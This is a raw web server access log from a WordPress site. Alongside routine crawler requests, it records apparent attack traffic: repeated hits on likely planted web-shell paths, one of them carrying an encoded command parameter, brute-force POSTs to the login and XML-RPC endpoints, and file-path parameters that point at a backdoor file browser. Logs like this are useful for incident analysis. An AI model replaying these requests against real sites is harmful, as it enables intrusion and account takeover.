142.4.205.1 - - [16/Oct/2025:19:38:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313531382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373931382q3536316633623236376365316363346336353161393261653662386537303939222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:38:13 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 3845 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:38:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313533382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373933382q3533653961313762353030323338333337333161643937363337333161636538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:39:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313535382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373935382q3236363965366165356239393030643362613636393761373230653636643930222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
103.82.38.57 - - [16/Oct/2025:19:40:36 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38"
103.82.38.57 - - [16/Oct/2025:19:40:37 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38"
142.4.205.1 - - [16/Oct/2025:19:39:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313537382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373937382q3463623466366532393766653235313838616631333737343030356136353832222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [16/Oct/2025:19:40:37 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/Text/Diff/Renderer HTTP/1.0" 200 7143 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/Text/Diff" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.65.197 - - [16/Oct/2025:19:40:38 -0400] "GET /?_g=446778 HTTP/1.0" 200 23811 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [16/Oct/2025:19:40:41 -0400] "GET /?_g=2024911 HTTP/1.0" 200 24133 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.239.195.42 - - [16/Oct/2025:19:40:49 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:40:51 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes/twentytwentyone-fr_FR.po&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes HTTP/1.0" 200 13628 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:40:53 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-walker-nav-menu.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 9341 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:40:55 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-registry.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 8827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:40:56 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-source.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7668 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:19:39:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313539382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373939382q3936633966343735643732336263323231383235336431643465326630363432222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
145.239.195.42 - - [16/Oct/2025:19:40:58 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:40:58 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-editor-context.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7218 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:00 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes/twentytwentyone-fr_FR.po&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes HTTP/1.0" 200 13628 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:00 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-list.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:03 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-walker-nav-menu.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 9341 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:05 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-registry.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 8827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:07 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-source.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7668 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:09 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-editor-context.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7218 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.65.196 - - [16/Oct/2025:19:41:10 -0400] "GET /?_g=49573 HTTP/1.0" 200 24042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.239.195.42 - - [16/Oct/2025:19:41:11 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-list.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
69.197.179.242 - - [16/Oct/2025:19:39:45 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:40:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313631382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635383031382q6138383235333734363938623836366234663931323264303938623964613132222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
145.239.195.42 - - [16/Oct/2025:19:41:24 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:25 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes/twentytwentyone-fr_FR.po&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes HTTP/1.0" 200 13628 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:27 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-walker-nav-menu.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 9341 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-registry.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 8827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:31 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-source.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7668 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:33 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-editor-context.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7218 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:41:35 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-list.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:19:40:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313633382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635383033382q3135366338656234383538303066633438633762373331333664386433353638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:19:41:43 -0400] "GET /?_g=449554 HTTP/1.0" 200 23964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:40:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313635382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635383035382q6362386331646234313530643737373330343966323463323565323233373366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [16/Oct/2025:19:42:00 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/Text/Diff/Engine HTTP/1.0" 200 7315 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/Text/Diff" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
162.241.224.38 - - [16/Oct/2025:19:42:02 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
162.241.224.38 - - [16/Oct/2025:19:42:03 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
162.241.224.38 - - [16/Oct/2025:19:42:04 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
66.249.65.197 - - [16/Oct/2025:19:42:06 -0400] "GET /?_g=1146603 HTTP/1.0" 200 25019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.241.224.38 - - [16/Oct/2025:19:42:07 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
162.241.224.38 - - [16/Oct/2025:19:42:10 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
162.241.224.38 - - [16/Oct/2025:19:42:11 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:41:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313637382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635383037382q6437653834373738646432393461373437393835303831366536663332363036222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
145.239.195.42 - - [16/Oct/2025:19:42:23 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:42:24 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes/twentytwentyone-fr_FR.po&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes HTTP/1.0" 200 13628 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:42:26 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-walker-nav-menu.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 9341 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:42:28 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-registry.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 8827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:42:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-bindings-source.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7668 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
145.239.195.42 - - [16/Oct/2025:19:42:31 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-editor-context.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7218 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.65.196 - - [16/Oct/2025:19:42:32 -0400] "GET /?_g=1984709 HTTP/1.0" 200 25028 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [16/Oct/2025:19:42:32 -0400] "GET /?_g=695208 HTTP/1.0" 200 25054 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.239.195.42 - - [16/Oct/2025:19:42:33 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/www/wp-includes/class-wp-block-list.php&path=/var/www/vhosts/academiedumarketing.com/www/wp-includes HTTP/1.0" 200 7824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:19:41:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313639382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635383039382q6664366533653937626132326263383964336636306663383664613364366634222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:41:13 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.195 - - [16/Oct/2025:19:42:40 -0400] "GET /?_g=161117 HTTP/1.0" 200 24050 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.99.162.239 - - [16/Oct/2025:19:42:41 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
88.99.162.239 - - [16/Oct/2025:19:42:42 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
66.249.65.195 - - [16/Oct/2025:19:42:43 -0400] "GET /?_g=365933 HTTP/1.0" 200 23909 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.99.162.239 - - [16/Oct/2025:19:42:44 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
